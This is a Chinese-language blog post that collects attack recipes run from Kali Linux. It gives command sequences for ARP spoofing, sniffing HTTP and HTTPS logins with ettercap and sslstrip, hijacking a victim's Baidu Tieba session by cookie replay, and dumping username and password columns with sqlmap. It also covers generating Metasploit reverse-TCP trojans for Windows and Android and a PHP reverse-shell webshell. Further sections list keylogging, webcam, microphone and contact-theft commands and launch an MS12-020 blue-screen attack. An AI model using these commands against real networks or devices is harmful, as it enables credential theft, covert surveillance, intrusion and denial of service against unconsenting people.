基于kali实现的一些攻击

本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢!

1、局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机)
(1)Windows下查询本机IP地址、默认网关:Cmd下ipconfig
(2)查找局域网中的IP地址:

  fping -asg 10.22.116.0/24

基于kali实现的一些攻击_第1张图片
(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关
模拟ip地址为10.22.116.184的PC是受害者:

arpspoof -i eth0 -t 10.22.116.184 10.22.116.254

此时该PC将无法正常上网----攻击目的达到。
注:ARP断网相当于ARP欺骗的错误配置(不完全配置)造成的现象。

2、局域网下ARP欺骗(目标的IP流量经过我的网卡,进行转发,从网关出去)
(1)开启IP转发流量:

echo  1 > /proc/sys/net/ipv4/ip_forward

(2)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关
(3)获取本机网卡的图片drifnet -i eth0(利用该条命令配合上述的ARP欺骗,可以看到流经本机网卡的受害人的图片流量)
注:(1)echo命令不会有回显;(2)静态网关的情况下ARP欺骗将不会成功。

3、局域网HTTP账号密码获取(使用工具:ettercap—欺骗、DNS欺骗、流量嗅探)
(1)开启IP流量转发:echo 1 > /proc/sys/net/ipv4/ip_forward
(2)查看内容:cat /proc/sys/net/ipv4/ip_forward(观察上述命令是否成功)
(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关
模拟本机是受害者:

arpspoof -i eth0 -t 10.22.116.184 10.22.116.254

(4)ettercap -Tq -i eth0
T 代表启动文本模式 q 代表启动安全模式
注:截取到的信息之后如果用户名为中文时显示出来的不是真正的用户名,此时复制用户名字段,上百度搜索URL解码也可以解码出原始用户名

4、局域网下HTTPS账号密码获取(使用工具sslstrip)—本质是先将HTTPS转化为HTTP,然后根据第三条操作
(1)开启SSH连接:

/etc/init.d/ssh start	//连接到Xshell

(2)vim /etc/ettercap/etter.conf(打开该文件)
去除文本if you use iptables之后的#号(两个#号)
(3)sslstrip -a -f -k
sslstrip:把HTTPS的链接还原为HTTP
(4)开启IP流量转发:

echo  1 > /proc/sys/net/ipv4/ip_forward

(5)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关
(6)ettercap -Tq -i eth0
T 代表启动文本模式 q 代表启动安全模式
该攻击容易使受害人PC出现证书错误网页这一幕
注:单独命令前加!(感叹号)可以看到最近运行的含有该单词的命令。

5、局域网下登录别人的百度贴吧
方法一:
(1)进行ARP欺骗
(2)启动wireshark 抓包工具
此时受害人登录贴吧,抓包工具会抓取一些数据,然后我们保存文件为.pcap文件
(3)ferret 重新生成抓包后的文件

ferret -r cookies.pcap

然后对新生成的文件执行:cp 该文件名 /root/
(4)hamster (重放流量)
基于kali实现的一些攻击_第2张图片
发现需要本地开代理(如下图)
基于kali实现的一些攻击_第3张图片
然后在浏览器输入127.0.0.1:1234,访问该网站
找到www.atcpu.com的网址,点击
注:访问浏览器获取不到信息时,检查是否执行了cd到桌面复制 ferret生成的文件到root/:cp hamster.txt /root/
方法二:
(1)进行ARP欺骗
(2)使用ferret

ferret -i eth0

(3)浏览器提前设置端口,然后hamster,接着访问127.0.0.1:1234
然后跟方法一最后的步骤相同,登录到受害人的百度贴吧!

6、SQLMAP、ASP网站渗透
(1)形成注入漏洞、获取数据库库名

Sqlmap -u “网址”		//-u   检测是否存在注入 、 返回数据库的名字

需要启动线程(最大线程10)
(2)获取表名

Sqlmap -u “网址” --tables		//猜解所有表名

(3)通过猜解的表名,获取列名

Sqlmap -u “网址” --columns  -T “表名”		//获取列名

(4)猜解数据

Sqlmap -u “网址” --dump -C “列名,列名”  -T “表名”   //多列猜解       --dump是下载数据,显示的意思     C “列名,列名” 是需要猜解的数据对应的列名

(5)最后猜解出数据
注:asp网站大多使用access 微软文件数据库、MYSQL使用较多

7、SQLMAP、渗透PHP网站
(1)

Sqlmap  -u “网址”		//检测是否存在注入

(2)

Sqlmap  -u “网址” --is-dba		//检测是否存在dba权限,若存在dba权限,则可以写目录,将文件写在文件夹下面

(3)

 Sqlmap  -u “网址” --dbs		//列出所有的数据库

 Sqlmap  -u “网址” --current-db		//查询自己的数据库

(4)

 Sqlmap  -u “网址” --tables -D “数据库名”		//根据自己数据库名查询所有的表

(5)

 Sqlmap  -u “网址” --columns -T “列名” -D “数据库名”		//查询所有的列名

(6)

 Sqlmap -u “网址” --dump -C “列名,列名”  -T “表名” -D “数据库名”   //多列猜解       --dump是下载数据,显示的意思     C “列名,列名” 是需要猜解的数据对应的列名

(7)
若密码passwd存在解码问题,则登录www.cmd5.com解码!
注:PHP网站使用MYSQL较多

8、SQLMAP–Cookie注入
当使用之前7、8中的常规方法检测是否存在注入不行的时候,尝试Cookie中转注入
(1)例:对于某网站http://www.hajkfkahf.com.cn/about.asp?id=56

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --cookie “id=56” --level 2		//如果是cookie注入就要把等级提升为level 2

然后就可以开始注入
(2)

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --tables --cookie “id=56” --level 2	//猜解所有表名

(3)

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --columns-T “表名” --cookie “id=56” --level 2			//猜解所有列名

(4)

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --dump -C “username,password” -T “表名” --cookie “id=56” --level 2		//假如存在username、password列

9、Metasploit–远程控制软件生成、系统操作
进入kali虚拟机输入msfconsole,启动命令行模式
exploits模块:漏洞利用模块
payloads模块:shellcode 漏洞执行后的代码

use exploit/windows/smb/ms08_067 _netapi		//选择漏洞模块(按下TAB可以进行)
show options		//查看要填入的参数(此时需要填入一个IP地址)
set RHOST IP地址
set PAYLOAD windows/meterpreter/reverse_tcp			//选择tcp的反向链接

当所有的设置填充完毕之后,输入exploit进行攻击

在此,介绍怎么去生成一个小木马~
木马:控制端 (控制远程) 服务端(木马程序)
(1)进入kali启动msf:msfconsole
(2)自己IP地址为:
基于kali实现的一些攻击_第4张图片

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 X > test.exe		//根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)

然后就会生成一个名为test.exe的木马程序
(3)

use exploit/multi/handler		//使用handler这个模块
set PAYLOAD windows/meterpreter/reverse_tcp		//使用shellcode

然后填写生成木马的IP、PORT(跟上面生成木马时相同)
(4)然后输入exploit执行msf等待木马生效,生效后即可通过命令行进行操作!
(5)输入background执行msf —将已连接的会话放在后台
sessions -l —查看已经连接的会话
sessions -i 1 —连接到之前仅有的一个会话
(6)注入进程:因为木马很可能随时被结束—持久访问

ps				---得到要注入的PID进程;找到explorer.exe,得到该进程的进程号
Migrate PID ---注入进程
run vnc		---获取受害者电脑桌面

(7)文件管理功能

download+文件名 	下载文件
edit+文件名 			 	编辑文件
cat+文件名 				 查看文件
mv+文件名 				 移动文件
rm+文件名 				 删除文件
upload+文件名 		上传文件
mkdir+文件夹名 		创建文件
rmdir+文件夹名 		删除文件夹
shell						直接切到对应位置

(8)网络与系统操作
网络

arp			看arp缓冲表
getproxy	获取代理
ifconfig	看IP地址及网卡
netstat		查看端口链接

系统

kill			结束进程
ps			查看进程
reboot		重启电脑
reg			修改注册表
shell		获取shell
shutdown	关机
sysinfo		获取电脑信息

(9)

enumdesk tops	用户登录数
keyscan-dump		键盘记录--下载
keyscan_start		键盘记录--开始
keyscan_stop		键盘记录--停止
uictl						获取键盘鼠标控制权			//uictl disable/enable keyboard/mouse
record_mic			音频录制							//record_mic -d 10 表示录制10秒;提前安装mplayer:apt-get install mplayer;录制完成后mplayer+录制文件
webcam_chat		查看摄像头接口
webcam_list			查看摄像头列表
webcam_stream	摄像头视频获取
getsystem			获取高权限
hashdump			下载HASH密文

注:不用连接数据库;如果代码出错,可以先删掉metasploits:apt -get remove metasploits,然后再重新安装一遍:apt -get install metasploits;RHOST目标IP,LHOST本地IP;操作过程中可以help查看命令

10、Metasploit–渗透安卓实战
(1)生成木马

use exploit/multi/handler		//做一个反弹会话链接,使用handler这个模块
set PAYLOAD android/meterpreter/reverse_tcp		//使用shellcode
show options		//查看要填入的参数(此时需要填入一个IP地址)
set RHOST IP地址
set PAYLOAD android/meterpreter/reverse_tcp			//选择tcp的反向链接
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 R > test.apk		//根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)
exploit		//等待木马生效

(2)会话连接好之后

search       				搜索	jpg png bmp
download				下载	jpg png bmp
webcam-snap			手机截屏
webcam_stream		开启摄像头
webcam_list      webcam_stream -i 2		前后摄像头互换  参数-i
check_root			 	检查ROOT
dump-calllog			下载电话记录;可能出现编码问题,换编码---leafpad
dump_contacts		下载信息记录
geolocate				 GPS定位

11、Metasploit–服务器蓝屏攻击(此攻击参考教程)
(1)确定攻击目标 MS12-020
执行msf,search ms12-020
基于kali实现的一些攻击_第5张图片
(2)

use auxiliary/scanner/rdp/ms12-020-check					//利用该漏洞
show options												//查看并填入参数
set RHOST 受害服务器IP地址
exploit														//确定该服务器存在漏洞
use auxiliary/dos/windows/rdp/ms12-020-maxchannelids
set RHOST 受害服务器IP地址
exploit             										//攻击服务器,此时达到服务器蓝屏攻击的目的;此时重启受攻击的服务器重启就可恢复
execute -f notepad											//远程打开记事本

12、Metasploit–生成webshell及应用
(1)在msf中生成一个PHP脚本

msfpayload php/meterpreter/reverse_tcp LHOST=kali本机IP地址 R > web.php		//生成一个PHP脚本,当做webshell
cat web.php  //查看脚本内容---通过修改其中的IP地址、端口号可以实现攻击其他pc的目的

(2)上传该脚本(ftp……)

use exploit/multi/handler		//做一个反弹会话链接,使用handler这个模块

然后做set LHOST、LPORT……
然后exploit等待脚本触发(运行PHP文件即可触发)
(3)
通过之前所学,使用可用命令达到期望的目标
…………

作者:苏小酱

你可能感兴趣的:(安全)